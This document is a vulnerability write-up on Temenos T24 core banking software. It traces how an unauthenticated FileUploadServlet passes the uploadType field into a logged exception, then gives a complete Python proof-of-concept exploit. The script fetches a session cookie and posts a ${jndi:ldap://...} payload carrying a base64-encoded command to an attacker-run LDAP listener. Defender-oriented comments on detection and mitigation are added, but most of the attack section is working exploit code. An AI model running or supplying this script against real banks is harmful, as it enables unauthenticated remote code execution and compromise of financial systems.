Technical Analysis
The vulnerability exists in Temenos T24, which is widely used in core banking.
There are many entry points that trigger this vulnerability; as an example, I used the FileUploadServlet, because it is accessible without any authentication:
package com.temenos.t24browser.servlets; public class FileUploadServlet extends HttpServlet { public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { FileUploadServlet.InnerServletClass innerObj = new FileUploadServlet.InnerServletClass(request); //truncated if (paramName.equalsIgnoreCase("uploadType")) { innerObj.setUploadType(paramValue); innerObj.setUploadTypeInfoFromT24(); <= //truncated
The uploadType value comes from user input and is then passed to innerObj.
Content of innerObj.setUploadTypeInfoFromT24():
private void setUploadTypeInfoFromT24() { try { String responseXml = FileUploadServlet.this.sendUtilityRequest("OS.GET.UPLOAD.TYPE.INFO", this.uploadType, this.request); String uploadTypeInfo = Utils.getNodeFromString(responseXml, "uploadTypeInfo"); if (FileUploadServlet.LOGGER.isDebugEnabled()) { FileUploadServlet.LOGGER.debug("File upload: uploadTypeInfo=" + uploadTypeInfo); } if (!uploadTypeInfo.contains("<maxFileSize>")) { throw new IllegalArgumentException("EB-FILE.UPLOAD.TYPE.NOT.FOUND|" + this.uploadType + "|"); <= } }
As you can see, if the uploadType is invalid, an exception whose message contains the user-supplied uploadType is thrown and passed to LOGGER.error().
PoC script:
"""PoC request flow from the write-up, annotated for defenders.

Two HTTP requests are sent: a GET to BrowserServlet to obtain a JSESSIONID
cookie, then a multipart POST to FileUploadServlet whose ``uploadType`` form
field carries a ``${jndi:ldap://...}`` lookup string. Per the analysis above,
an invalid uploadType ends up in the message of the IllegalArgumentException
that is passed to LOGGER.error(); that log call is the sink.

Detection: alert on the literal ``${jndi:`` token in request bodies and form
fields (the multipart field name here is ``uploadType``), and on outbound LDAP
connections from the application host (the lookup presumably dials the
``ldap://`` address embedded in the token). The PoC depends on an
attacker-operated listener, left as the ``<server>`` placeholder below; no
real host is given on the page.
Mitigation: keep the logging framework from resolving ``${...}`` lookups in
message text, and restrict egress from the application servers.
"""
import requests
import base64
import sys

target = sys.argv[1]
cmd = base64.b64encode(sys.argv[2])
print("Attacking " + target)
print("Cmd: "+ sys.argv[2])
# Listener address is a placeholder left by the author; not a real host.
ldap_url = "ldap://<server>:2389/Deserialization/ROME/command/base64/"+cmd
# Step 1: fetch a session cookie from BrowserServlet; no credentials are sent,
# which matches the "accessible without any authentication" claim above.
burp0_url = target + "/BrowserWeb/servlet/BrowserServlet"
burp0_headers = {"Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": target + "/BrowserWeb/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
ct = requests.get(burp0_url, headers=burp0_headers, verify=False)
token = ct.cookies.get('JSESSIONID')
# Step 2: multipart POST to FileUploadServlet. The only form field is
# uploadType, and its value is the JNDI lookup string -- this field is the
# indicator to look for in WAF/proxy logs.
burp0_url = target + "/BrowserWeb/servlet/FileUploadServlet"
burp0_cookies = {"JSESSIONID": token}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarygrfK28lThpyA12GG", "User-Agent": "Mozilla/5.0", "Connection": "close"}
burp0_data = "------WebKitFormBoundarygrfK28lThpyA12GG\r\nContent-Disposition: form-data; name=\"uploadType\"\r\n\r\n${jndi:"+ldap_url+"}\r\n\r\n------WebKitFormBoundarygrfK28lThpyA12GG--\r\n"
requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, verify=False)